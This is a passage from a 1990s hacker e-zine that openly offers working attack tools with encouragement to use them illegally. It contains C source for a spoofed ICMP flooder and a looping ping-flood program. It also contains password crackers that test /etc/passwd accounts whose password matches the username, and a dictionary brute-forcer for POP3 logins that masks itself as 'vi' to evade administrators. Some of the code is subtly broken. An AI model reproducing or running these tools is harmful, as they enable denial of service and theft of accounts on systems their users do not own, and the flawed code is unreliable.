data = (char *)(packet+pingsize+IPHDRSIZE+IPHDRSIZE+ICMPHDRSIZE);
memset(packet, 0, 5122);
/* ip->saddr = spoof_addr; */
ip->version = 4;
ip->ihl = 5;
ip->ttl = 255-random()%15;
ip->protocol = IPPROTO_ICMP;
ip->tot_len = htons(pingsize + IPHDRSIZE + ICMPHDRSIZE + IPHDRSIZE + 8);
bcopy((char *)&destaddr.sin_addr, &ip->daddr, sizeof(ip->daddr));
bcopy((char *)&spoofaddr.sin_addr, &ip->saddr, sizeof(ip->saddr));
ip->check = in_cksum(packet,IPHDRSIZE);
/* origip->saddr = t_addr; this is the 'original' header. */
origip->version = 4;
origip->ihl = 5;
origip->ttl = ip->ttl - random()%15;
origip->protocol = IPPROTO_TCP;
origip->tot_len = IPHDRSIZE + 30;
origip->id = random()%69;
bcopy((char *)&destaddr.sin_addr, &origip->saddr, sizeof(origip->saddr));
origip->check = in_cksum(origip,IPHDRSIZE);
*((unsigned int *)data) = htons(pingsize);
/* 'original IP header + 64 bits (of bogus TCP header)' made. */
icmp->type = 8; /* should be 3 */
icmp->code = 0;
icmp->checksum = in_cksum(icmp,pingsize+ICMPHDRSIZE+IPHDRSIZE+8);
return sendto(socket,packet,pingsize+IPHDRSIZE+ICMPHDRSIZE+IPHDRSIZE+8,0,
(struct sockaddr *)&destaddr,sizeof(struct sockaddr));
/* ICMP packet is now over the net. */
}
/* MAIN ------------------------------------------------------ */
void main(int argc, char *argv[])
{
int s, i;
int floodloop;
banner();
if (parse_args(argc,argv))
{
usage(argv[0]);
return;
}
resolve_all(dest_name, spoof_name);
give_info();
s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
#ifdef IP_HDRINCL
fprintf(stderr,"We have IP_HDRINCL! =] \n\n");
if (setsockopt(s,IPPROTO_IP,IP_HDRINCL,(char*)&x,sizeof(x))<0)
{
perror("setsockopt IP_HDRINCL");
exit(1);
}
#else
fprintf(stderr,"We don't have IP_HDRINCL! =[\n\n");
#endif
if (!flood)
{
if (icmp_echo_send(s,spoof_addr,dest_addr,pingsize) == -1)
{
printf("%s: error sending ping packet\n",argv[0]); perror(""); return;
}
}
else
{
floodloop = 0;
if ( pingnmbr && (pingnmbr > 0) )
{
printf("flooding... packet limit set.\n");
for (i=0;i<pingnmbr;i++)
{
if (icmp_echo_send(s,spoof_addr,dest_addr,pingsize) == -1)
{
printf("%s: error sending packet\n",argv[0]); perror(""); return;
}
usleep((pingsleep*1000));
if (!(floodloop = (floodloop+1)%25))
{ fprintf(stdout,"."); fflush(stdout);
}
}
printf("flooding completed - %u packets sent.\n", pingnmbr);
}
else {
printf("flooding. each dot equals 25 packets.\n");
for (i=0;i<1;i)
{
if (icmp_echo_send(s,spoof_addr,dest_addr,pingsize) == -1)
{
printf("%s: error sending packet\n",argv[0]); perror(""); return;
}
usleep(900);
if (!(floodloop = (floodloop+1)%25))
{ fprintf(stdout,"."); fflush(stdout);
}
}
}
}
}
-----------------------
ping floods
-----------------------
Ping floods are very similar to ICMP_ECHO floods, in that they both send
thousands of replies that the host you are attacking will reply to, not
realizing that repling to the ping can be bogging down system resources.
Probably one of the bets ways to run these is with a IP spoofer, so the
computer takes more time trying to reply to a dead ip, and it also will
keep your sysadmin yelling at you in case the attacked host sysdamin
traces the connection.
from the command prompt you could use:
ping -s 4000 host &
* if you are running linux, then just use the -f command which sends out pings
as fast as possible, thus bogging the remote system.
Or you could code this simple C program:
/* pingkill.c - by Scud-O */
#include <stdio.h>
#include <stdlib.h>
void main()
{
while(1)
{
system (ping -s 4000 host);
sleep(3);
}
}
You can also use a for loop or a counter if you do not want this program to
run forever.
-----------------------------------
PLEASE NOTE: for any of these attacks it is advisable to run them in the
background, since these attacks can take some time, especially if the system
is quite large. ( if you dont know how to run stuff in the background, go
hang yourself ( actually just add a & at the end of a command, and if you want
the command to still run after you log off, do a nohup command & ) )
-------------------------------------------------------------------
* Thanks to daemon9 for his indepth discussion of TCP/SYN flooding in phrack
48.
* Thanks to Keystroke for the code, and to who ever wrote it.
----------------------------
* If you need ANY help to fight off these attacks, just e-mail me and I will
be glad to help you. - Scud-O ( FoxMulder@worldnet.att.net )
___________________________________________________________________
[The 'g0d' Project]
General Info, Techniques, Etc by Scud-O
.......................................
The 'g0d' Project is <c> HBS 1996,1997
!ALL RIGHTS RESERVED!
.......................................
I. Introduction
The first question you must be having about this little project is...
But Aren't you an athiest? Well, yes, but this project was named after god
because I find it quite humorous, and the fact that it is easy to come up with
good quotes for 'g0d' to say.
II. What the hell is 'g0d'?
Well, to put it simply, 'g0d' is what will be developed into an AI Bot
for IRC. Why? Well, because it seems like I cool idea. I have heard of another
bot called 'mama' written by a Peter Sjostrom, and is on some irc servers
#amiga, but I can not confirm this.
III. How the hell did you come up with this idea?
Well, one night when I was ENCREDIBLY bored on IRC, I changed my nick
to g0d and pretended to be the AI Bot. It was quite fun, and many fools
believed me. So after that night I started to think, hell maybe I COULD code a
simple AI bot and then keep extending its powers.
IV. When is 'g0d' going online?
Well, currently I am debating whether to code g0d in C or HEAVILY
modify an eggdrop to my needs. I WAS going to add g0d to #phreak a while back,
but g0d was to run on tombin's server, and well he fucked up my account, so
to date ( 2/22/97 ) g0d in his eggdrop form is not online. But I predict that
I can get a VERY simple version of 'g0d' up by early June, or sooner, it all
depends on my work load and if I EVER get some sleep since lately I have been
becoming an insomiac and not been sleeping.
V. How the hell do you expect this to work?
Well, really it is very simple. The will be 2 main parts to this bot,
The actual bot which communicates to the servers manages its connection,
writes and reads text, etc, And the actual AI part of the bot. The AI will
mainly consist of a string parser, which will tear up users words, and then
if they match any of the bots files, it will reply. g0d will hopefully also
watch over quit messages and identify netspilts, offer files, and of course
offer those ever so funny quotes when a user on the list joins the channel and
then op them.
VI. g0d v0.11
g0d version 0.11 should be up soon. This version will have only VERY
limited AI, almost none really, and is to be based on |\|\cFill's bot example
in THTJ 5. So if you see g0d on #phreak say hello and see what he does. heh.
.......................................
live in fear, g0d is coming to punish the sinners and reward the disciples!
.......................................
Watch for this and other bots coming soon from HBS!
Reload - A very basic bot that basically just visits and revisits
the same web page or pages over and over (helps with the
web counters no?)
Black Widow - Site indexer or spider (similar to the ones that servers
like Lycos and others) with a possible feature that
'rates' web pages using a VERY basic parser like in 'g0d'
Newman - Just like the character from 'Seinfeld' this little bot
will play havoc on users mail and possibly news ( random
news cancels? random mail floods? what will happen next? )
___________________________________________________________________
NOAOL.CGI will be here next month!
___________________________________________________________________
RTFM : UNIX Basics 101
Last month I wanted to write my own beginner's guide to UNIX, but
with deadlines and failing grades, it was not to be. So instead I had to add
a lame old lod text. Anyway, here it is, MY very own guide to UNIX, and basic
UNIX crackin. Enjoy.
[Basic UNIX Info And Cracks]
by Scud-O
If you didnt know, UNIX was first created at AT&T Bell Labs in 1969
after the wake of the failed Multix project. Since those days, AT&T has
greatly improved it, The University of California at Berkley has made their
own version ( BSD), which is also quite popular, Sun makes a version, and of
course there is the ever popular linux for the PCs. During this time, UNIX
took over the Internet, and is the domiant OS in the world. Sounds like it
would be extremely useful to know for both hacking, and future jobs, doesnt
it? Well you are in luck... this file is here to help.
Basic UNIX Commands:
Many UNIX commands are fairly simple, ( while some are very complex,
you will probably not use them or encounter them much, since they are used to
manipulate files, etc.) and if you know DOS, many of the commands are similar.
First: A basic run down of commands:
start bourne shell sh
start c shell csh
start korn shell ksh
call up a unix system (modem) cu
chat with a user talk
clear screen clear
run command at a specific time at
run a series of commands batch
compile c programs cc
compress file compress
uncompress file uncompress
copy a file cp
count words in a file wc
create new text file cat, vi, ed
change current directory cd
stop a process kill
date + time date
delete file rm
make directory mkdir
disk usage by dir du
dir list ls
remove a dir rmdir
print working directory pwd
display free or total space df
display file cat,page,more
edit file vi, ed
email mail, elm, pine
notify on email notify
encrypt file crypt
display/set environment env
exit exit
find file find
change ownership chown
change file permissions chmod
move file mv
save a log of current session script
login as another user su
remote host login rlogin, telnet
login system login
run commands after you logg off nohup
run commands in background add '&' after program
run commands a low priority nice
send msg to all users wall
turn on/off talk mesg
system news news
show machines on network ruptime
set password passwd
pause before command sleep
print lp
show processes ps
link files ln
start remont shell on a system rsh
check spelling spell
info on unix system uname
info on user who
info on user finger
write messages to user write
help man
----------
These are just some of the few commands a UNIX systems provides. There
are of course the usual Internet commands also:
telnet remote system login
ftp file transfers
mail email
irc irc!
lynx world wide web
news newsgroups
etc...
The commands you will use the most:
copy file cp
create text file cat, vi, ed
change current directory cd
delete file rm
dir list ls (use ls -l for more info)
make dir mkdir
display a file cat,more,page
edit files vi, ed
show processes ps
help man
-----------------------------------
These commands will get you though about 90% of common day to day UNIX life.
I recommend that you (a) Buy a simple book on UNIX, and (b) Get an ISP with
shell accounts, or use the shell that your ISP offers. Don't try to hack a
shell just yet, pay for one until you are fairly well used to unix, and then
work on cracking accounts. evilempire.org will be offering shells when it
opens, L0pht offers them, and most ISPs will sell you to you.
[Basic Cracks]
If you look back at issue 7 there is an article called Joes. A Joe is
a user that uses his userid as his password. I have included the C code from
that article to make your life simple.
/**********************************************************************
* joetest.c
*
* a -SIMPLE- password cracker that cracks account with the same username and
* password. (a 'joe')
*
* NOTE: If your system has shadowed passwords, then this must be run as root!
*
* Written for The HAVOC Technical Journal issue 7 by Scud-O
* http://www.geocities.com/SiliconValley/8805/
***********************************************************************/
#include <stdio.h>
#include <pwd.h>
int main(int argc, char **argv)
{
struct passwd *pw;
while(pw=getpwent() )
{
char *crypt();
char *result;
result = crypt(pw->pw_name,pw->pw_passwd);
if(!strcmp(result,pw->pw_name,pw->pw_passwd))
{
printf(" %s is a joe\n", pw->pw_name);
}
}
exit(0);
}
I have included this file, since most systems have a c compiler.
Just use: cc joetest.c to compile, and the run it. On may small systems you
may turn up nothing, and on larger systems you should probably find a few,
but you never know!
I also have 2 perl scripts that do the same thing, but one has a few
added features. I gave you the C code, since not all systems have perl, due
to security holes.
#!/usr/local/bin/perl
# joetest for perl
while (($name, $passwd) = getpwent) {
print "$name is a joe\n" if (crypt($name,$passwd) eq $passwd);
}
This code is for perl 5 only, and it includes some more features:
#!/usr/local/bin/perl
# joetest for perl 5 ( super joetest )
while (($name, $passwd) = getpwent) {
print "$name is a joe\n" if (crypt($name,$passwd) eq $passwd);
print "$name has no password\n" if !$passwd;
print "$name is a JOE\n" if (crypt(uc($name),$passwd) eq $passwd);
print "$name is a Joe\n" if (crypt(ucfirst($name),$passwd) eq $passwd);
print "$name is a eoj\n" if (crypt(scalar reverse $name,$passwd) eq $passwd);
}
----------------------------------------------
Just so you know:
The passwords on a system are kept in the file /etc/passwd .
On some systems, the file is shadowed, so only the admin can see the passwords
Passwords are also encrypted using crypt, which is a fairly strong one way
encryptor.Here is what a passwd file may look like:
root:WnDFHddnKu28M:0:1:system PRIVILEGED account:/:/bin/csh
nobody:*Nologin:65534:65534:anonymous NFS user:/:
nobodyV:*Nologin:60001:60001:anonymous SystemV.4 NFS user:/:
daemon:*:1:1:system background account:/:
bin:*:3:4:system librarian account:/bin:
.
.
.
rest of the lines have been deleted to save space...
.
.
------------------------------------------------------
These programs should all give you a quick into to hacking, and provide some
fun until next month.
There is still much to cover, but this issue is over due, and I need
to get it out, so just wait until next month when we will have more great info
for you all.
------------------
For the end of this month, I know that you will want to try to do some REAL
hacking now that you know some UNIX, and not just play around on some shell
account you are paying for, so I have included this c program that with a
host name, a password file, and a dictionary, it will find POP ( post office
protocol -- the commonly used mail protocol) passwords, which many time,
thanks to users stupidity, are the same as the full account passwords.
Anyway, have fun, to compile it: cc pop3hack.c , should do very well
for you. Also, remember from here on out, you are actually doing something
illegal, so stop and think about this for a minute.... are you ready? are
you gunna hack? If you dont say 'hell yes' prepare to be smacked!
-- pop3hack.c --
#include <stdio.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdarg.h>
/* First, define the POP-3 port - almost always 110 */
#define POP3_PORT 110
/* What we want our program to be masked as, so nosy sysadmins dont kill us */
#define MASKAS "vi"
/* Repeat connect or not - remember, logs still report a connection, so
you might want to set this to 0. If set to 0, it will hack until it finds
1 user/password then exit. If set to 1, it will reconnect and try more
user/passwords (until it runs out of usernames) */
#define RECONNECT 0
/* The function prototypes */
void nuke_string(char *);
int pop_connect(char *);
int pop_guess(char *, char *);
char *getanswer(char *);
char *getanswer_(char *);
void swallow_welcome(void);
void hackity_hack(void);
int popfd;
FILE *popfp;
FILE *userfile;
FILE *dictfile;
char host[255];
char dict[255];
char user[255];
main(int argc, char **argv)
{
if(argc < 4)
{
/* invalid syntax, display syntax and exit */
printf("Syntax: %s host userfile dictfile\n", argv[0]);
exit(0);
}
/* Validate that the host exists */
if(pop_connect(argv[1]) == -1)
{
/* Error */
printf("Error connecting to host %s\n", argv[1]);
exit(0);
}
printf("Connected to: %s\n\n", argv[1]);
/* Check for the existance of the user file */
userfile=fopen(argv[2], "rt");
if(userfile==NULL)
{
/* Error */
printf("Error opening userfile %s\n", argv[2]);
exit(0);
}
fclose(userfile);
/* Checking for the existance of dict file */
dictfile=fopen(argv[3], "rt");
if(dictfile==NULL)
{
/* Error */
printf("Error opening dictfile %s\n", argv[3]);
exit(0);
}
fclose(dictfile);
/* Copy important arguments to variables */
strcpy(host, argv[1]);
strcpy(user, argv[2]);
strcpy(dict, argv[3]);
nuke_string(argv[0]);
nuke_string(argv[1]);
nuke_string(argv[2]);
nuke_string(argv[3]);
strcpy(argv[0], MASKAS);
swallow_welcome();
hackity_hack();
}
void nuke_string(char *targetstring)
{
char *mystring=targetstring;
while(*targetstring != '\0')
{
*targetstring=' ';
targetstring++;
}
*mystring='\0';
}
int pop_connect(char *pophost)
{
int popsocket;
struct sockaddr_in sin;
struct hostent *hp;
hp=gethostbyname(pophost);
if(hp==NULL) return -1;
bzero((char *)&sin,sizeof(sin));
bcopy(hp->h_addr,(char *)&sin.sin_addr,hp->h_length);
sin.sin_family=hp->h_addrtype;
sin.sin_port=htons(POP3_PORT);
popsocket=socket(AF_INET, SOCK_STREAM, 0);
if(popsocket==-1) return -1;
if(connect(popsocket,(struct sockaddr *)&sin,sizeof(sin))==-1) return -1;
popfd=popsocket;
return popsocket;
}
int pop_guess(char *username, char *password)
{
char buff[512];
sprintf(buff, "USER %s\n", username);
send(popfd, buff, strlen(buff), 0);
getanswer(buff);
sprintf(buff, "PASS %s\n", password);
send(popfd, buff, strlen(buff), 0);
getanswer(buff);
if(strstr(buff, "+OK") != NULL)
{
printf("USERNAME: %s\nPASSWORD: %s\n\n", username, password);
return 0;
}
else return -1;
}
char *getanswer(char *buff)
{
for(;;)
{
getanswer_(buff);
if(strstr(buff, "+OK") != NULL) return buff;
if(strstr(buff, "-ERR") != NULL) return buff;
}
}
char *getanswer_(char *buff)
{
int ch;
char *in=buff;
for(;;)
{
ch=getc(popfp);
if(ch == '\r');
if(ch == '\n')
{
*in='\0';
return buff;
}
else
{
*in=(char)ch;
in++;
}
}
}
void swallow_welcome(void)
{
char b[100];
popfp=fdopen(popfd, "rt");
getanswer(b);
}
void hackity_hack(void)
{
char *un;
char *pw;
char *c;
int found=0;
un=(char *)malloc(512);
pw=(char *)malloc(512);
if(un==NULL || pw==NULL) return;
userfile=fopen(user, "rt");
dictfile=fopen(dict, "rt");
if(userfile == NULL || dictfile == NULL) return;
for(;;)
{
while(fgets(un, 50, userfile) != NULL)
{
found=0;
c=strchr(un, 10);
if(c != NULL) *c=0;
c=strchr(un, 13);
if(c != NULL) *c=0;
while(fgets(pw, 50, dictfile) != NULL && found==0)
{
c=strchr(pw, 10);
if(c != NULL) *c=0;
c=strchr(pw, 13);
if(c != NULL) *c=0;
if(strlen(pw) > 2 && strlen(un) > 2)
if(pop_guess(un, pw)==0)
{
found=1;
fclose(popfp);
close(popfd);
if(RECONNECT==0)
{
free(pw);
free(un);
fclose(userfile);
fclose(dictfile);
exit(0);
}
pop_connect(host);
swallow_welcome();
}
}
fclose(dictfile);
dictfile=fopen(dict, "rt");
}
fclose(dictfile);
fclose(userfile);
free(un);
free(pw);
exit(0);
}
}
-- pop3hack.c --
Next Month: Real Hacking
___________________________________________________________________
HBS
Who is HAVOC Bell Systems?
Scud-O : Linux Lammah
psych0 : All Around Lammah
Keystroke : Mad PLA Insider (issue 9 submissions editor)
REality : the Digital Man
UnaBomber : (busted again?)
memor : the MAN in France
Agrajag : yet another MAD PLA insider!
Digital_X : the rewt 0f A11 3\/i1!
theLURK3R : almost g0dlike
Redtyde : a demigod
darkcyde : The brother from another planet!
disc0re : The pain in AT&T's arse (issue 9 distributer)
KungFuFox : The Guest Editor for issue 9!
-----------
* |\|\cFill and SanchoPanza have been taken off, since mainly they are MIA
Cool Undernet Channels:
#phreak, #hackers, #corrupt
Cool People:
ArcAngl : the OTHER BellAtlantic phreak
darc : The MAN
Jisa : she looks just like Scully.. I Swear!
ec|ipse : I'm coming to your house to kill you fool!
zeth : the cellular 'GOD'
phire : liked the SSI article in hacknowledge issue 2!
dr1x : showed our lame asses how to start up confs
tombin : thanks fer the account! - wtf did you do to it?
CiND3R : you ever REALLY there anymore?
hrdluk : thanks for connecting me and REality
yesimlame : are you ever really on anymore?
digipimp : where the hell is yer article?
btm : you are god
WeatherM : pan1k's right hand man
Demonweed : welcome back
BC219 : da other #phreak chick
Defraz : future hoster of evilempire.org( until co-location)
trixert : (aka trix-ahoy) same
Po0f : #corrupt / CorrupT creator
Cool mofos: Setuidrwt, iCBM, CraKerJaK, AnTiFiRe
Lammah(s) of the Month:
_Kinst_ : BITCH!
-------------------------------------------------------------------
This Month Question(s): Why is Kung going to edit issue 9?
Because not only does he kick major arse monkeys, he agreed to do it.
But Kung isnt the only one on the new THTJ editorial staff. both Keystroke and
disc0re have prominent roles in next issues release. So send them some e-mails
tellin em to make the issue better than the rest so Scud-O doesnt come back!
keystroke@thepentagon.com | ender@multigames.com | don't mail disc0re
Next Month's Question: For KungFuFox to decide....
-------------------------------------------------------------------
Next Month:
This MAY be what we will have in issue 9
- Java Virues Pt. I
- MAPI Mailbombing and other funky ass shit
- TAPI - overview, dos source, win95 source(?)
- ICMP - overview
- TFTP Weaknesses
- More from the RTFM
- Much, Much more TBA!
Issue 9 is out April 1st!
Send all articles for issue 9 to: keystroke@thepentagon.com
Cya next issue! - The leet mofo's at THTJ
==========================================================
= Is this copy of The HAVOC Technical Journal Skunked? =
= If this file doesn't read at 67879 bytes, it probably =
= doesn't have a born on date! Get a fresh copy from our =
= site at: http://www.geocities.com/SiliconValley/8805/ =
==========================================================
